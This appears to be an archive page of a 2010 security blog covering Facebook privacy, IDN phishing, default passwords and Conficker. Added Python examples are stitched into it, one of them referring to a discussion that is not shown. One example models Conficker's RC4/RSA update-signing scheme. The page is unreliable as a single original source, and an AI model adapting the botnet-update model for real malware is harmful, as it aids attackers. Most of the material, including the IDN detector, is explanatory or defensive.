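The two properties at stake in this discussion, that additions and multiplications carry through the encryption and that every operation grows a noise term which eventually swamps the message, can be seen in a few lines. The Python below is an added example, not Smart and Vercauteren's lattice construction: it is the secret-key version of the "over the integers" scheme of van Dijk, Gentry, Halevi and Vaikuntanathan (2010), which was designed as a simplified relative of Gentry's scheme. The parameters are toy-sized and insecure; the point is the noise budget, which is exactly what makes naive use impractical and what Gentry's bootstrapping idea is needed to reset.

```python
"""Toy somewhat-homomorphic encryption over the integers (secret-key variant).

Added example. Parameters are far too small to be secure; the scheme is the
symmetric form of the van Dijk/Gentry/Halevi/Vaikuntanathan integer scheme.
"""
import random


def keygen(rng, bits=31):
    """Secret key: a random odd integer p with its top bit set."""
    return rng.getrandbits(bits) | (1 << (bits - 1)) | 1


def encrypt(p, m, rng, q_bits=80, r_max=16):
    """c = p*q + 2*r + m.  The message bit m is the parity of the small noise term 2r + m."""
    q = rng.getrandbits(q_bits)
    r = rng.randint(1, r_max)
    return p * q + 2 * r + m


def noise(p, c):
    """The noise term 2r + m, exact as long as it has not grown past p."""
    return c % p


def decrypt(p, c):
    return noise(p, c) % 2


def add(c1, c2):
    """XOR of the plaintext bits; noise terms add."""
    return c1 + c2


def mul(c1, c2):
    """AND of the plaintext bits; noise terms multiply."""
    return c1 * c2


def truth_tables(seed=1):
    """AND and XOR evaluated under encryption for all four input pairs: {(a, b): (and, xor)}."""
    rng = random.Random(seed)
    p = keygen(rng)
    table = {}
    for a in (0, 1):
        for b in (0, 1):
            ca, cb = encrypt(p, a, rng), encrypt(p, b, rng)
            table[(a, b)] = (decrypt(p, mul(ca, cb)), decrypt(p, add(ca, cb)))
    return table


def multiplications_until_exhausted(p, rng, limit=64):
    """Multiply fresh encryptions of 1 together, tracking the exact noise term; return how
    many products stayed below p/2, the margin past which decryption is no longer reliable."""
    c = encrypt(p, 1, rng)
    exact = noise(p, c)
    for k in range(limit):
        f = encrypt(p, 1, rng)
        c, exact = mul(c, f), exact * noise(p, f)
        if exact >= p // 2:
            return k
    return limit


def depth_demo(seed=3):
    rng = random.Random(seed)
    return multiplications_until_exhausted(keygen(rng), rng)


if __name__ == "__main__":
    print(truth_tables())
    print("multiplications within the noise budget:", depth_demo())
```

With a 31-bit p and fresh noise below 34, only a handful of multiplications fit before the noise reaches p/2; real parameters push that depth up, but not without limit, and that is the gap the Smart and Vercauteren improvement narrows rather than closes.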

Wednesday, May 26, 2010

A look back at posts in May 2009

This time last year I made some of my favourite posts. First I celebrated that I had reached about 1,000 visits and 2,000 page views a month, and now I am about double that.

Rethinking Thresholds for Account Lockouts was a simple post asking if the three-strikes-you're-out password policy makes sense. I posted my second Password Roundup #2, and reviewed the Qualys study The Half-life of Vulnerabilities is still 30 Days.

I also developed some thoughts on why web app bugs don’t get fixed in The $28,000 Question: Project vs. Production Risk, after Jeremiah Grossman estimated that 28,000 well-spent dollars could fix the bugs at many sites.

On the crypto side I broke some news about The cost of SHA-1 collisions reduced to 2^52, and took a look at AES-256 and Reputational Risk. The AES post is now on the first page of a Google search for “aes 256” and has brought a steady flow of visits since last May, 1346 in total. I also asked if anyone could verify that the Total Internet computational power = 2^85 operations, a statement I read in an ECRYPT report. I ended up contacting the authors and nope, no one knows where it came from. Sounds possible though.

I also posted The Sub-Time Crisis in Web 2.0, my thoughts on information overload in Web 2.0. I only used half the text I typed in from my written notes.

A nice how-to article on protecting USB drives with a password and encryption using Windows Vista or 7 and BitLocker.

Do you carry sensitive data in your pen drive? Then you should carefully keep your pen drive. Oh! You mean you are not that careful too. Then I would suggest that you should password protect your pen drive. Yes folks, you can do this by a simple method. This is an added advantage to Windows Vista and Windows 7 users that they can easily password protect their pen drives with the help of BitLocker Drive Encryption. Its an inbuilt feature of both of these operating systems.

This is just great.

Shark Fin Posts

I have been making daily posts this month, partly to see what people read on a given day, and what they keep on reading. Quite a few of the posts turn out to have a hit graph that looks like a shark fin. Here is the one for What is the LINPACK rating of Conficker?

What the graph shows is that there are no hits before the post is published (of course!), then a spike when it first appears and for a few days after, ending in just a few hits by a week later or so. After that it’s up to Google, industrious visitors or self-referential posting to raise the hits again.

Google could help enforce new German wireless protection law

A German court has ruled that home users are responsible for password-protecting their home wireless networks, and failing to do so could result in a fine of 100 euros. The ruling stems from a case where a musician sued the owner of a home WiFi network for illegally downloading his music, but since the network owner was away on holiday, the open network was being used by some third party.

The maximum fine of 100 euros (or about $120) is about the same as a hefty speeding ticket, and with 26 million WiFi-enabled German households, that could add up. All those Google Street View spycars could help out with enforcement of the law, since they have been collecting wireless information anyway.


Tuesday, May 25, 2010

Whit Diffie does the Can Can

In Not so sunny for Whit Diffie I briefly posted on his unexpected exit from Sun soon after their acquisition by Oracle, and his taking up a visiting academic position in the UK. Computerworld recently reported that Diffie has now landed a new position as vice president at ICANN, managing the security of their networks.

It seems he was just a bit too late to give his blessing to the recent commissioning of DNSSEC on each of the 13 root name servers of the Internet. However there will be a formal key ceremony in June which may require a cryptographic high priest, or he may yet bag one of the coveted crypto officer roles, to whom key recovery shares will be entrusted.

He also does a good impression of Gandalf the Brown.

Monday, May 24, 2010

Security Bloggers Network under attack?

Update: This is a hoax mail leading to a rogue site, so please don't click it. Check out the Lijit blog for details (via Alan).

Just got this from Lijit, the hosting firm for SBN

Facebook juggernauts towards 500 million users

AllFacebook.com has observed that, based on linear projections of current sign-up rates, Facebook will pass the 500 million user milestone by the end of June. Using population data published by the CIA, we will therefore soon have the situation where only China and India as countries will have more people than Facebook (1.33 and 1.56 billion respectively). Projecting further, Facebook will have twice as many people as the US by year end (around 600 million), and approximately a billion dollars in revenue as well.

It remains to be seen whether the current privacy backlash against Facebook introduces unpleasant non-linearities into these projections. A recent informal poll taken by Graham Cluley of Sophos, found that almost two thirds of the 1588 respondents are considering leaving Facebook. If we round up the respondents to an even 1600, and noting that Facebook has more than 320 million users currently, the survey represents a sample of less than 0.0005% of all users (that’s just 5% of 1% of 1% of the total). Even so, PC World has reported the survey under the headline Study: 60 Percent of Facebook Users Mulling to Quit which, I hope you will agree, is a bit grandiose. This is an example of how the non-linearities of reputational risk start accruing against a company with widespread and sustained bad press - and more will follow.

Privacy may yet be the Black Swan of Facebook.

Sunday, May 23, 2010

Interesting password graphic from CXO. I am not quite sure what the people axis is meant to show, or exactly what social class is represented by a Douche. In any case, the examples were verified by Google’s password strength meter, and give a good visual of the password spectrum (click to enlarge).

Saturday, May 22, 2010

Y2Gay: gay marriage from the database perspective

This is quite an interesting post which the author describes as a “stream of consciousness about equal parts nuptial rights and Structured Query Language”. The author is actually taking a serious look at how to redesign your database to accommodate gay (same sex) marriages, with quite a few amusing digressions. After outlining 14 detailed steps to follow for the transformation, the conclusion is that
Perhaps the simplest solution would be to ban marriage outright. Or, better yet, to declare everybody as married to everybody else. But then what would the database engineers do all day?
There are 145 comments as well.

Friday, May 21, 2010

Why have there been so many Natural Catastrophes of late?

The Freakonomics blog reports that Foreign Policy magazine has responded to concerns that we are living in particularly harrowing times, experiencing more than our share of natural disasters. But FP reports that we are not. What we actually have is a heightened awareness that these events are occurring, thanks to rapid and prolonged media coverage.

Based on U.S. Geological Survey records dating back to 1900, the Earth experiences 16 major earthquakes per year on average, where a major quake is one whose magnitude is 7.0 or more. There were only 6 major quakes in 1986 but 32 in 1943. And this year? 6 so far, so we might be headed for an above average year, but not an extreme year. However, there has been an increase in the loss of life from earthquakes (650,000 people in the last decade) due to the expansion of urban areas into fault zones. This is another factor which increases media coverage of these tragedies.

Thursday, May 20, 2010

Conficker, RSA and RC4

I was reading the excellent paper An Analysis of Conficker's Logic and Rendezvous Points from SRI and was surprised to learn that Conficker botnet updates are distributed at its rendezvous points as encrypted and signed binaries using RC4 and RSA (the “R” in both cases here stands for Ron Rivest). Both the A and B variants of Conficker use these checks to ensure that the updates have been created by the Conficker authors – just like any other software vendor issuing updates and patches. The paper depicts the update process as follows

So each Conficker client carries an RSA public key E for signature verification. A Windows binary file F is encrypted and signed as follows
• Hash F to produce a 512-bit hash M
• Encrypt F with RC4 using M as the key
• Sign M using private key D
A Conficker client authenticates the encrypted binary as follows
• Using the embedded public key E, compute the signature verification to recover M
• Decrypt the encrypted binary using RC4 and M as the key
• Verify that the hash of F is in fact M
The RSA key is 1024 bits for Conficker A and 2048 bits for Conficker B, and both keys are listed in the paper. That’s a large public key for Conficker B, but it is dwarfed by the 512-bit symmetric key used in RC4. Yes, RC4 can support such huge key sizes, and I will explain in a future post how this is possible.
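The three producer steps and the three client checks above fit together as follows. This is an added example written for this page, not code from the SRI paper or from any real implementation: it models the scheme with textbook RSA (the hash signed directly, no padding) and a toy-sized key generated from a fixed seed, and it assumes SHA-512 for the 512-bit hash. It also shows the point about the key size: the RC4 key schedule indexes the key as key[i mod keylen], so any key of 1 to 256 bytes is accepted, including a 64-byte hash. Requires Python 3.8 or later for pow(e, -1, phi).

```python
"""Model of the hash / RC4-encrypt / RSA-sign update scheme described above.

Added example for this page (not code from the SRI paper or any real
implementation): textbook RSA on the hash, no padding, toy-sized key.
SHA-512 is assumed for the 512-bit hash M.
"""
import hashlib
import random


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher; encryption and decryption are the same operation.

    The key schedule uses key[i % len(key)], so any key of 1..256 bytes works,
    which is why a 64-byte (512-bit) hash can be used directly as the key.
    """
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):                              # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                 # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _is_probable_prime(n: int, rng: random.Random, rounds: int = 32) -> bool:
    """Miller-Rabin test, adequate for a demonstration key."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int, rng: random.Random) -> int:
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1   # top bit set, odd
        if _is_probable_prime(cand, rng):
            return cand


def make_keypair(bits: int = 576, seed: int = 0):
    """Toy RSA keypair; the modulus must exceed 2**512 so that M < n.

    The fixed seed keeps the demo reproducible. Real keys come from a CSPRNG
    and a proper library, with a 1024- or 2048-bit modulus as in the paper.
    """
    rng = random.Random(seed)
    e = 65537
    while True:
        p, q = _random_prime(bits // 2, rng), _random_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return (e, p * q), (pow(e, -1, phi), p * q)      # (public E, private D)


def package_update(binary: bytes, priv) -> tuple:
    """Producer side: hash F to M, RC4-encrypt F under M, sign M with D."""
    d, n = priv
    m = hashlib.sha512(binary).digest()               # 512-bit M
    ciphertext = rc4(m, binary)                       # M doubles as the RC4 key
    signature = pow(int.from_bytes(m, "big"), d, n)
    return ciphertext, signature


def verify_update(ciphertext: bytes, signature: int, pub):
    """Client side: recover M from the signature, decrypt, re-hash, compare.

    Returns the plaintext binary, or None when any check fails. A forged or
    corrupted signature usually yields a value that does not even fit 64 bytes.
    """
    e, n = pub
    try:
        m = pow(signature, e, n).to_bytes(64, "big")
    except OverflowError:
        return None
    binary = rc4(m, ciphertext)
    return binary if hashlib.sha512(binary).digest() == m else None


def demo() -> tuple:
    """Round trip on a constructed payload, plus two failure cases."""
    pub, priv = make_keypair()
    binary = b"MZ\x90\x00 constructed sample payload, not a real executable"
    ciphertext, signature = package_update(binary, priv)
    genuine = verify_update(ciphertext, signature, pub) == binary
    flipped = ciphertext[:-1] + bytes([ciphertext[-1] ^ 0x01])
    tampered_rejected = verify_update(flipped, signature, pub) is None
    bad_sig_rejected = verify_update(ciphertext, signature + 1, pub) is None
    return genuine, tampered_rejected, bad_sig_rejected


if __name__ == "__main__":
    print(demo())   # (True, True, True)
```

Because M is both the signed value and the decryption key, a client that cannot recover a valid M from the signature cannot even decrypt the payload, let alone accept it; the final hash comparison then catches any change to the ciphertext itself.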

Wednesday, May 19, 2010

Phishing and scamming in the new Top Level Domains

Earlier this month saw the historic introduction of non-Latin domain names on the Internet by ICANN. Half the global internet population does not have a language written in Latin script as their mother tongue, and sites can now have Arabic names for example, and eventually Chinese, Thai and Tamil ones.

The blog of security company Sûnnet Beskerming has a post which points out some security risks associated with the new non-Latin names
A risk, which isn't immediately obvious, is that this opens up a new world of opportunity for scammers and phishers to register domains that will visually appear very similar to legitimate sites in the address bar, but which will have a base address significantly different, thanks to being registered in a non-Latin script. By relying on alternate character rendering, this could cause problems for users who may not be able to determine the slight differences between otherwise similar looking characters. It also means that software and tools designed to help detect phishing or XSS attacks will have to expand their repertoire significantly to interpret and assess a much broader range of character and rendering sets.
The opportunities for typosquatting will probably multiply, and the Register recently reported this market to be worth almost half a billion dollars annually. You can read more about this market in Measuring Typosquatting Perpetrators and Funders by Tyler Moore from Cambridge University.
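The quoted post says that anti-phishing tools must learn to assess a much broader range of characters. The check below is an added example for this page (not code from Sûnnet Beskerming, the Register or Tyler Moore’s paper) of what such a tool does at its simplest: it decodes punycode labels as a browser receives them, reports labels that mix scripts, and reports labels whose look-alike letters resolve to a watched brand name. It assumes that the script of a character can be read from the first word of its Unicode name and uses a small constructed subset of the Unicode confusables table; a label written entirely in one non-Latin script is deliberately not treated as an indicator.

```python
"""Defensive check for IDN look-alike domains.

Added example for this page, not code from any vendor or paper. Assumptions:
labels arrive in punycode ('xn--') form as the browser sends them, a
character's script is the first word of its Unicode name, and CONFUSABLES is
a small constructed subset of the Unicode confusables table.
"""
import unicodedata

# Constructed subset: Cyrillic letters that render like Latin ones.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
    "\u0455": "s", "\u04bb": "h",
}
COMMON = set("0123456789-")          # characters that belong to no script


def scripts_of(label: str) -> set:
    """Set of scripts used by the letters of a decoded label."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0]
            for ch in label if ch not in COMMON}


def skeleton(label: str) -> str:
    """Replace known confusables by the Latin letter they resemble."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def decode_label(raw: str) -> str:
    """Turn an 'xn--' label into its Unicode form; other labels pass through."""
    if raw.startswith("xn--"):
        return raw.encode("ascii").decode("idna")
    return raw


def assess_hostname(hostname: str, watched=("apple", "google", "paypal")) -> list:
    """Report indicators that a hostname imitates a watched brand.

    Returns a list of (label, reason) tuples; an empty list means no indicator.
    """
    findings = []
    for raw in hostname.lower().rstrip(".").split("."):
        try:
            label = decode_label(raw)
        except UnicodeError:
            findings.append((raw, "undecodable punycode"))
            continue
        scripts = scripts_of(label)
        if len(scripts) > 1:
            findings.append((label, "mixed scripts " + ",".join(sorted(scripts))))
        skel = skeleton(label)
        if skel != label and skel in watched:
            findings.append((label, "looks like " + skel))
    return findings


def demo() -> list:
    """Constructed hostnames, converted to wire form and assessed."""
    samples = [
        "example.com",                      # plain Latin
        "\u0430pple.com",                   # Cyrillic a followed by Latin pple
        "g\u043e\u043egle.com",             # two Cyrillic o's
        "\u0645\u062b\u0627\u0644.com",     # Arabic label, single script
    ]
    results = []
    for host in samples:
        wire = host.encode("idna").decode("ascii")   # what the browser sends
        results.append((wire, assess_hostname(wire)))
    return results


if __name__ == "__main__":
    for wire, findings in demo():
        print(wire, findings)
```

The mixed-script rule is the cheap, general check (it needs no brand list); the skeleton comparison is what catches a whole-label imitation, and in practice it is backed by the full confusables data rather than the ten entries constructed here.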

Tuesday, May 18, 2010

Two universities rethink Gmail migration plans

The University of California at Davis (UCD) and Yale University were considering moving their email systems onto Gmail, but both have put those plans on hold for the moment. The CIO of UCD, Peter Siegel, said that he was not prepared to risk the security or privacy of the school’s 30,000 faculty and staff.

Yale has delayed a more general migration to Google apps, including Gmail, citing security and privacy concerns over cloud-based management of their data. Michael Fischer, a computing professor, said that
Google stores every piece of data in three centers randomly chosen from the many it operates worldwide in order to guard the company’s ability to recover lost information — but that also makes the data subject to the vagaries of foreign laws and governments, Fischer said. He added that Google was not willing to provide ITS with a list of countries to which the University’s data could be sent, but only a list of about 15 countries to which the data would not be sent.
So there is a concern that the personal data of students and faculty is being stored outside US jurisdictions. However, neither UCD nor Yale ruled out migrating to Google cloud applications once there is adequate transparency about the protection of data.

Monday, May 17, 2010

10 Reasons Why Microsoft's Internet Explorer Dominance is Ending

It has been widely reported recently that Microsoft’s share of the global browser market has fallen below 60% for the first time. If this trend continues, Firefox is forecast to overtake IE by Christmas 2012. Don Reisinger at eWeek has given his reasons why IE is losing market share (and also mind share) as follows
1. The European Union
2. Microsoft's complacency
3. Internet Explorer's security
4. Rebounding from IE 6
5. The features aren't there
7. The united fight against Microsoft
8. The educated user
9. No-names are actually doing well
10. Microsoft is still lost on the Web

Sunday, May 16, 2010

Numerical Palindromes

Someone at work put up the following pattern on a whiteboard

1 x 1 = 1
11 x 11 = 121
111 x 111 = 12321
1111 x 1111 = 1234321
11111 x 11111 = 123454321
111111 x 111111 = 12345654321
1111111 x 1111111 = 1234567654321
11111111 x 11111111 = 123456787654321
111111111 x 111111111 = 12345678987654321

So squaring a number that is all 1’s gives a numerical palindrome. Why?

Well there is a nice simple visual answer
More on such patterns here.
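The reason, worked through in code as an added example for this page (not from the original post or the page it links to): a repunit of n ones is the sum of 10^i for i below n, so the coefficient of 10^k in its square is the number of pairs (i, j) with i + j = k. Those counts run 1, 2, ..., n, ..., 2, 1, which is a palindrome as long as no count exceeds 9 and so no carry occurs. The example also shows the caveat the whiteboard stops short of: at n = 10 the middle count is 10, a carry happens, and the pattern breaks.

```python
"""Why the square of a repunit (a number made of n ones) is a palindrome.

Added example for this page. The digit at position k of repunit(n)**2, before
carrying, counts the pairs (i, j) with i + j = k; that sequence is symmetric,
and it survives as the decimal digits only while every count is at most 9.
"""


def repunit(n: int) -> int:
    return (10 ** n - 1) // 9                  # repunit(3) == 111


def pair_counts(n: int) -> list:
    """Coefficient of 10^k in repunit(n)**2 before any carrying."""
    return [min(k + 1, 2 * n - 1 - k) for k in range(2 * n - 1)]


def is_palindrome(x: int) -> bool:
    s = str(x)
    return s == s[::-1]


def check(n: int) -> tuple:
    """(square, counts rebuild the square, no carry needed, square is a palindrome)."""
    square = repunit(n) ** 2
    counts = pair_counts(n)
    rebuilt = sum(c * 10 ** k for k, c in enumerate(counts))
    return square, rebuilt == square, max(counts) <= 9, is_palindrome(square)


if __name__ == "__main__":
    for n in range(1, 11):
        print(n, check(n))     # rows 1..9 are palindromes; row 10 is not
```

The second element of the tuple is True for every n, since summing the pair counts against powers of ten is just the multiplication itself; the third and fourth elements are what separate n = 9 (12345678987654321) from n = 10 (1234567900987654321).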

Saturday, May 15, 2010

Great Security white papers and briefs from Damballa

Security provider Damballa has a great collection of white papers and briefs for download. I have listed a few below, most of which have already been uploaded to Scribd
Also don’t forget the recommendation I made on the technical overview at Compass Security, a Swiss company, about a year ago.

6 Hot And Sought-After IT Security Skills

Dark Reading has reported a short list of desirable skills in IT Security, partly because the “IT security job market is booming”. Apparently you’re quite marketable (particularly in the US) if your resume includes
1. Incident-handling/response
2. Compliance know-how
3. Risk management
5. Government security clearance
Frankly, I think if you had a sufficient quantity of skill number 4 you would not be in IT Security.

Friday, May 14, 2010

The EFF has an article on the changes to the privacy policy at Facebook over the last few years noting five significant changes (downgrades) since 2005. In short Facebook has flipped from a private social network to one where your data is largely public by default, mainly since Facebook can profit by selling this information to advertisers and business partners.

Here is the 2005 privacy language
No personal information that you submit to Facebook will be available to any user of the Web Site who does not belong to at least one of the groups specified by you in your privacy settings.
and the April 2010 version
When you connect with an application or website it will have access to General Information about you. The term General Information includes your and your friends’ names, profile pictures, gender, user IDs, connections, and any content shared using the Everyone privacy setting. ... The default privacy setting for certain types of information you post on Facebook is set to “everyone.” ... Because it takes two to connect, your privacy settings only control who can see the connection on your profile page. If you are uncomfortable with the connection being publicly available, you should consider removing (or not making) the connection
Quite a change. Matt McKeon has produced an interesting interactive infographic to depict privacy erosion on Facebook over the last 5 years

Thursday, May 13, 2010

1733 default vendor passwords now online

cirt.net has made 1733 default passwords for almost 400 vendors available online as a searchable database, complete with a Firefox plugin. Changing default passwords is security basics, but it’s not always followed. Last year an Australian student wrote a worm which compromised jailbroken iPhones with SSH installed where the default password had not been changed.

The Swan Song of Mark Curphey

About two months ago Mark Curphey (Security Buddha), in a confessional post, informed us all of his intentions to move on from IT Security, and reinvent himself 2.0-style into web technology, agile development, social software and user experience. He gave his reasons for moving on as follows
For the last few years I have grown increasingly disillusioned with the security industry to the point where after nearly two years of thinking and talking about it I have decided that it’s time for me to move on. There is a long list of frustrations and I have seriously thought about a last detailed shot over the bow with some home truths as I see them. The reality is it will probably not be productive. I had commentary about the security circus and the clowns, ring masters and performance artists that play in the big top; commentary about the lack of genuine computer science that finds its way into security; commentary about the lack of business science that is being adopted (why aren’t security people obsessed by Freakonomics?); commentary about the sad fact that for the most part we are still doing “the same old shit” 15 years after I first started (the definition of insanity is to do the same thing twice and expect a different result); commentary about the farce of PCI (and related standards) and people caring about trivial issues (easy to understand and sensationalist in nature) when looming holes that could have major impacts go unnoticed ... I could go on. People thinking they need “purple dinosaur” features in their security software because some marketing spin says so and commentary about the sheer FUD being pumped out by the marketeers. I have watched an industry spin out of control largely paying lip service to the term risk and watched sectors of it become largely irrelevant outside of their own self-fulfilling set of prophesies. When things go right no one notices (at least outside of security) and when things go wrong everyone points fingers. That’s a tough place to be impactful and remain positive.
A tough place to be impactful and remain positive. Mark’s new blog is here, and he still seems to have a few comments to make on security yet.

Wednesday, May 12, 2010

Some quotes from my first 200 posts

My 200th post was sent to the No Tricks blog yesterday, and to celebrate here are 30 or so quotes I quickly selected out of those posts.

The No Tricks Blog Name
The American basically asked "Why are you guys doing so much better than us?". The Japanese businessman is shown extending his fingers and counting off as he says "Your managers are greedy, your workers are lazy, and ...". But before he can finish even just the most obvious reasons, the American interrupts impatiently and says "I know, I know! But what's the trick?"
Excel is your new best friend
We can also stop beating ourselves up on the point that the weakness of IT Risk is the absence of data - the real weakness is poor modelling, and the decisions based on the output of such models.
Mr. Egerstad has stated that there is no security flaw with Tor - the real threat comes from user expectations that their message contents are being protected end-to-end by Tor, when in fact encryption is only applied to internal Tor network communication.
Flaws related to encryption always make good copy, and on occasion, strike at the heart of our fundamental beliefs in security. When encryption falters the whole edifice of security seems shaken.
This may seem an odd question given that since the mid 70's discussions about cryptographic keys have been mainly concerned about their potential shortness.
The Princeton team asked Nature the simple question of whether DRAM is cleared on power loss, and the simple answer is no.
A5/1 has operated unchanged for the last 21 years but it has now reached its cryptographic end-of-life, engulfed by the march of Moore's Law.
Intel's leading chip line, the x86, has steadily progressed from 286, 386, 486, Pentium and so on, but quantum computers will not be "1000-86" devices - unimaginably faster versions of what we have today.
Kaspersky has decided to make AV scanning more efficient not by making it faster but by doing less, as determined by risk-based criteria.
It is common that once the torch of enterprise risk management is kindled in the higher corporate echelons, it is passed down the ranks and settles with IT Security people to assume responsibility for the management of IT Risk. And these people are ill-equipped to do so.
Perhaps this reasoning prevailed at Adobe when they recently upgraded their document encryption scheme from AES-128 in v8 to AES-256 in v9. However Adobe later had to announce that v9 in fact offers less security against brute force attacks as compared to v8. What went wrong? They forgot about the spin.
Risk management is about making decisions today that will protect us from the uncertainty of the future. We are not looking for one in a million (the expert) but rather a million and one (the power of many).
We feel more informed, more empowered, and more enamoured with the promise of the omnipotent web. The web 2.0 narrative has worked its magic and we tacitly commit into a seemingly virtuous circle of information inflation.
Navigation and search are just for people who don't have any friends.
Disconnect from Twitter when you are receiving more than one tweet per second.
The AV blacklisting industry has reached a point of diminishing returns - the marginal value of producing additional signatures is minimal, but the underlying model can offer no more advice than to simply keep doing exactly that.
It could be said that PageRank is one part brilliance and two parts daring.
Often business has the “snappy intuitively appealing arguments without obvious problems” - plus Excel … Snappy and plausible usually wins out over lengthy, detailed and correct.
The observation here is that the security function is no longer called upon to critically underwrite the security risks of a project, with the option to reject.
Compound this disconnect between management and technical people over hundreds of thousands of projects at the corporate, national and international levels, spanning the last 30 years, and you have the disaster Ranum is describing (and lamenting).
The worst case scenario for Web 2.0 is that we are heading for a singularity, precipitated by dividing our attention into informational units effectively rated at zero content.
Imagine you posed the following question to a group of top physicists. You asked them to present you with ideas for new research projects where they could assume that the budget included all the money that we have, all the money that has ever been, and the total financial assets of the world for the next 10 million years. Would the resulting proposals be credible? AES-256 puts cryptanalysts on the same research agenda.
So for complex decisions that potentially have the greatest impact in terms of costs and/or reputation, in exactly the circumstances where a thorough risk assessment is required, transparency rather than rigour is the order of the day.
Doctorow remarks that the surprising outcome of this process was the realisation that we are missing a well-known service for handling key escrow in an era of military grade encryption being available to home users.
I don’t really think that there is a cult in operation over Bruce Schneier, but rather a hero was found when security as an industry needed to believe in heroes.
When I look back at crypto now it seems of similar consequence to the proportions of the Sun and Antares - not merely because my professional interests have changed, but in the vast equation that constitutes ERM, crypto is a variable with minor weighting. Its gravitational force is largely exerted on specialists, and rapidly declines (much faster than the inverse square law) beyond that sphere. It's just a pixel on the football-field sized collage of ERM.
So that’s 1,000 years of computation by a cluster that would envelop the earth to a height of one metre.
There are many posts and news articles of late on the TLS Renegotiation Attack. I had hoped that just by skimming a large number of these that some process of web osmosis would magically transfer an understanding of this vulnerability to me.
In the short term (and maybe the longer term as well) Diffie sees the cloud as a matter of trust. He advises to pick your supplier like you pick your accountant.
For each of us the web is a noisy channel, which we express through the need to search, subscribe, aggregate, recommend, post, tweet – in short a great cull of what finds its way onto our screens.
And while the traits of detail, accuracy and correctness are necessary for IT activities, they are fundamentally at odds with the type of messages and opinions that senior managers are expecting.
Some articles and posts have focussed on verifying passwords in software as the culprit, which is partly true, but the real issue is not software but insecure programming of software.
Gentry has estimated that building a circuit to perform an encrypted Google search with encrypted keywords would multiply the current computing time by around 1 trillion.